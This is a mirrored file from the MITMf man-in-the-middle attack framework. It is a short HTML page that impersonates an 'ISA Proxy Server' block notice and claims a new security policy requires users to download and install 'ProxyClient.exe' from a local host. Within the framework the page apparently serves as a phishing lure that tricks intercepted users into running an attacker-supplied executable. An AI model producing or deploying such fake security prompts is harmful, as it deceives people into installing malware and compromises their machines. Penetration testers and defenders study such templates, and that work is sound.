mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-03-12 04:35:49 -07:00
directory structure has been simplified by grouping all the poisoners and servers in one folder impacket smb server has been replaced with responder's flask http server has beem replaced with responder's modified config file to support new changes
32 lines
1.2 KiB
HTML
32 lines
1.2 KiB
HTML
<html>
|
|
<head>
|
|
<title>Website Blocked: ISA Proxy Server</title>
|
|
<style>
|
|
<!--
|
|
body, ul, li { font-family:Arial, Helvetica, sans-serif; font-size:14px; color:#737373; margin:0; padding:0;}
|
|
.content { padding: 20px 15px 15px 40px; width: 500px; margin: 70px auto 6px auto; border: #D52B1E solid 2px;}
|
|
.blocking { border-top: #D52B1E solid 2px; border-bottom: #D52B1E solid 2px;}
|
|
.title { font-size: 24px; border-bottom: #ccc solid 1px; padding-bottom:15px; margin-bottom:15px;}
|
|
.details li { list-style: none; padding: 4px 0;}
|
|
.footer { color: #6d90e7; font-size: 14px; width: 540px; margin: 0 auto; text-align:right; }
|
|
-->
|
|
</style>
|
|
|
|
</head>
|
|
<body>
|
|
<center>
|
|
<div class="content blocking">
|
|
<div class="title" id="msg_title"><b>New Security Policy: Website Blocked</b></div>
|
|
<ul class="details">
|
|
<div id="main_block">
|
|
<div id="msg_long_reason">
|
|
<li><b>Access has been blocked. Please download and install the new </b><span class="url"><a href="http://isaProxysrv/ProxyClient.exe"><b>Proxy Client</b></a></span><b> in order to access internet resources.</b></li>
|
|
</div>
|
|
</ul>
|
|
</div>
|
|
<div class="footer">ISA Security <b>Proxy Server</b></div>
|
|
</center>
|
|
</body>
|
|
</html>
|
|
|